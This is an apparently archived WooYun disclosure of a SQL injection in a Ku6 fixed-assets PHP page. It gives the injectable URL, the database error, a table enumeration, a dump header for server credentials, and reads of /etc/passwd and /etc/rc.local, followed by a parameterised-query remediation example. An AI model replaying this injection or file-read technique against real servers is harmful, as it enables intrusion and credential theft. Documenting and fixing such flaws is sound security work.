
SQL injection vulnerability on a core Ku6 server (files readable and writable with root privileges)

2015-01-01 03:05

Code block
http://fixedassets.ku6.cn/req_sub_business_list.php?business_id=1'

Query failed:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by sub_business_id' at line 1



Code block
Database: itil
[91 tables]




Code block
[06:34:32] [INFO] analyzing table dump for possible password hashes
Database: itil
Table: tb_newnode_server
[65 entries]
+-------+---------+-----------------+------+---------+---------+--------------+----------+
| id | ip2 | ip1 | user | port2 | port1 | passwd | server_u |
+-------+---------+-----------------+------+---------+---------+--------------+----------+


Proof of vulnerability:

readfile: /etc/passwd


readfile: /etc/rc.local

Code block
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
route add -net 10.11.0.0/16 gw 10.11.45.1
touch /var/lock/subsys/local

Remediation:

Filter the input.
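An added example (not from the original report or the site's code) of what filtering should amount to for this endpoint: the quoted-string query that the error message implies, beside a version that validates `business_id` as an integer, binds it as a parameter and keeps driver errors out of the response. The table name, the `name` column and the function names are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example, not the site's code. tb_sub_business, the name column and
// the function names are assumptions; the rows are constructed sample data.
// In-memory SQLite stands in for MySQL so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tb_sub_business (sub_business_id INTEGER, business_id INTEGER, name TEXT)');
$db->exec("INSERT INTO tb_sub_business VALUES (1, 1, 'row A'), (2, 1, 'row B'), (3, 2, 'row C')");

// Vulnerable pattern implied by the error message: the parameter is pasted
// between quotes and the driver error is returned to the client.
function list_vulnerable(PDO $db, string $businessId): array {
    $sql = "SELECT * FROM tb_sub_business WHERE business_id = '$businessId' ORDER BY sub_business_id";
    try {
        return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        return ['error' => 'Query failed:' . $e->getMessage()]; // discloses SQL details
    }
}

// Hardened: strict integer validation, bound parameter, generic error.
function list_hardened(PDO $db, string $businessId): array {
    $id = filter_var($businessId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return ['error' => 'invalid business_id'];
    }
    try {
        $stmt = $db->prepare(
            'SELECT * FROM tb_sub_business WHERE business_id = :id ORDER BY sub_business_id'
        );
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        error_log($e->getMessage()); // details stay in the server log
        return ['error' => 'internal error'];
    }
}

// A well-formed value and the malformed value from the report's request.
foreach (['1', "1'"] as $input) {
    echo "input: $input\n";
    echo '  vulnerable: ', json_encode(list_vulnerable($db, $input)), "\n";
    echo '  hardened:   ', json_encode(list_hardened($db, $input)), "\n";
}
```

On the MySQL side, the application should connect with an account that is not root and does not hold the FILE privilege, since that privilege is what lets an injection read and write server files.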

Source: www.wooyun.org/bugs/wooyun-2015-088881
